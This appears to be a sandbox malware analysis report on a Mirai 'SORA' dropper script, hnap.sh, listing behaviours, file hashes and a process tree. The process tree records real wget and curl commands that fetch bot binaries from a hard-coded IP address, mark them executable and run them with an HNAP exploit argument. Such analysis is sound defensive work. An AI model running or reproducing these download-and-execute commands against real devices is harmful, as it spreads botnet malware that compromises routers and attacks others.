Analysis
-
max time kernel
150s -
max time network
154s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
20-02-2025 16:26
Static task
static1
Behavioral task
behavioral1
Sample
hnap.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
hnap.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
hnap.sh
Resource
debian9-mipsbe-20240611-en
General
-
Target
hnap.sh
-
Size
2KB
-
MD5
76c625416800cf3073f832c6fdb90dfe
-
SHA1
1d9e582097338454f484559f64b639795e0aa51e
-
SHA256
73e4a86bb7a5969fc3ee995b34dec87af69f4083efac0828a9d4b89f25ffed6e
-
SHA512
9a8edf9a9d1ca1b67dd72b3e304a30bf585b450ec1386b5bd84438f7c22adecfd1e095d3d9b7dfa800cbf783fe8589047e0d6a7ea19d1f65cbdd03e20824766d
Malware Config
Extracted
mirai
SORA
Signatures
-
Mirai family
-
Contacts a large (33784) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 8 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 831 chmod 836 chmod 732 chmod 752 chmod 769 chmod 787 chmod 810 chmod 825 chmod -
Executes dropped EXE 8 IoCs
ioc pid Process /tmp/robben 734 hnap.sh /tmp/robben 753 hnap.sh /tmp/robben 770 hnap.sh /tmp/robben 789 hnap.sh /tmp/robben 812 hnap.sh /tmp/robben 826 hnap.sh /tmp/robben 832 hnap.sh /tmp/robben 837 hnap.sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral3/files/fstream-1.dat upx behavioral3/files/fstream-4.dat upx behavioral3/files/fstream-5.dat upx behavioral3/files/fstream-7.dat upx behavioral3/files/fstream-8.dat upx -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself mieoa4ipnf2 753 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/712/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/843/exe robben File opened for reading /proc/408/exe robben File opened for reading /proc/709/exe robben File opened for reading /proc/711/exe robben File opened for reading /proc/767/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/772/exe robben File opened for reading /proc/803/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/754/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/807/exe robben File opened for reading /proc/829/exe robben File opened for reading /proc/866/exe robben File opened for reading /proc/473/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/828/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/705/exe robben File opened for reading /proc/833/exe robben File opened for reading /proc/844/exe robben File opened for reading /proc/480/exe robben File opened for reading /proc/508/exe robben File opened for reading /proc/510/exe robben File opened for reading /proc/691/exe robben File opened for reading /proc/717/exe robben File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/821/exe robben File opened for reading /proc/854/exe robben File opened for reading /proc/757/exe robben File opened for reading /proc/710/exe robben File opened for reading /proc/720/exe robben File opened for reading /proc/770/exe robben File opened for reading /proc/831/exe robben File opened for reading /proc/834/exe robben File opened for reading /proc/837/exe robben -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 749 wget 750 curl 751 cat -
Writes file to tmp directory 17 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/sora.x86_64 wget File opened for modification /tmp/sora.x86_64 curl File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/robben hnap.sh File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.i686 wget File opened for modification /tmp/sora.i686 curl File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.i468 curl File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 curl
Processes
-
/tmp/hnap.sh/tmp/hnap.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:712 -
/usr/bin/wgetwget http://176.65.137.13/bins/sora.x862⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.x862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:726
-
-
/bin/catcat sora.x862⤵PID:730
-
-
/bin/chmodchmod +x hnap.sh robben sora.x862⤵
- File and Directory Permissions Modification
PID:732
-
-
/tmp/robben./robben hnap.exploit2⤵PID:734
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:749
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:750
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:751
-
-
/bin/chmodchmod +x hnap.sh robben sora.mips sora.x862⤵
- File and Directory Permissions Modification
PID:752
-
-
/tmp/robben./robben hnap.exploit2⤵
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
PID:753
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.x86_642⤵
- Writes file to tmp directory
PID:760
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.x86_642⤵
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/catcat sora.x86_642⤵PID:768
-
-
/bin/chmodchmod +x hnap.sh robben sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:769
-
-
/tmp/robben./robben hnap.exploit2⤵PID:770
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.i4682⤵PID:773
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.i4682⤵
- Reads runtime system information
- Writes file to tmp directory
PID:777
-
-
/bin/catcat sora.i4682⤵PID:786
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/robben./robben hnap.exploit2⤵PID:789
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.i6862⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
PID:796
-
-
/bin/catcat sora.i6862⤵PID:808
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.i686 sora.mips sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/robben./robben hnap.exploit2⤵PID:812
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/catcat sora.mpsl2⤵PID:824
-
-
/bin/chmodchmod +x hnap.sh robben sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/robben./robben hnap.exploit2⤵PID:826
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm42⤵PID:828
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/catcat sora.arm42⤵PID:830
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/robben./robben hnap.exploit2⤵PID:832
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm52⤵
- Writes file to tmp directory
PID:833
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:834
-
-
/bin/catcat sora.arm52⤵PID:835
-
-
/bin/chmodchmod +x hnap.sh robben sora.arm4 sora.arm5 sora.i468 sora.i686 sora.mips sora.mpsl sora.x86 sora.x86_642⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/robben./robben hnap.exploit2⤵PID:837
-
-
/usr/bin/wgetwget http://176.65.137.13/bins/sora.arm62⤵
- Writes file to tmp directory
PID:839
-
-
/usr/bin/curlcurl -O http://176.65.137.13/bins/sora.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:843
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
28KB
MD5fa9b6c7c37b9749884b432b1cfcd447c
SHA11ddf712db6bf2948950b7fd884766a1a5d2b4294
SHA2564a18c7f6e74bc6f4a20f948c8b0555f4688c80740a5eb9d3388fc8930ac65432
SHA5122f8f653f60de4a0562e524fb9993175a46b946e1fe476f3e180558baa0462f5725549c6587ad1b264df98cee8438adfab8bab7014ef423ff7a554ee59e9ef806
-
Filesize
28KB
MD5ce88468dfdee071a7a62485b512c56a1
SHA18a1c6f3d1024b98faba6b58072972e72936add17
SHA2569a720166ffa4e73959c5cb54af0b5637ad17cb1ac768f7a66939a07e9f0e28db
SHA51291eb34165af402c57d25c7c958605e03f680f271187174a0ab2e891c0c31322808e484a1c98b4bd6c924d68493b9d99f36474e45c4b29b5959530f79382c3d8c
-
Filesize
212B
MD583ab6cd9a67528bbc6f4f360cb7f8d83
SHA107e8f17209e0569aab39f062568ff0090d9b20d4
SHA2563ffdc3e7f17876fa23ee6595712e544975dc985d313fe07fd103e6cd3606b435
SHA512171e8022f004540814acfc611cd0c46f708fdc6dd2590042981cb00f8136baa6521155549a77e98352901b0dfa5a8d284feb37a7babf9e2bf400a9acc3bb686f
-
Filesize
28KB
MD5a70636d57e9deea3ce72e6e0212965f0
SHA14761f53ca4d1ba6f193adbb9c460acc6c8b14d38
SHA25686103ccdb8e57a2c6a9be1828561fbf4f07adc21e432f8e21ebcc10eebb0281c
SHA512e9b69afa60a19d13f7780428eea5b071328301282b3f589787078d45a6b79f53d9b8c8ae39a611564fa62b726c987851a6f1a2ef45e633039a53f9c07de6357b
-
Filesize
29KB
MD53d17ce5028fb74356e38f9977026d323
SHA15f705b4cdc1cfd34d66a50b878fc55a28d910e76
SHA256f2e98767c660fad2244e5b18844532932482019ef71f7577f3fb441f5720b710
SHA512cec4a19eee1993dc1f2abb46f1041670e9ec04f7c855dc172580d27eb4642bfc3916c7512d3ee785f3b2de777bca6530f8ee01ecf06906cd9b86baa128c70fb0
-
Filesize
27KB
MD5c0c367bd815a1550281a34845445dcb3
SHA1cdaeafd335143dd8c3584c0ba8362c6281b38786
SHA256438747b91b304a609ccd2b5a7502fea1e20b6beabdb035834f335825b182644e
SHA51260adf781185e829c222bd0570193cfa157bf622323404bb629692a9b18da9e73c8d59fd2305c96172f374fdab20dceadae45ac4137d6ae6e3fc6861ae8a24ead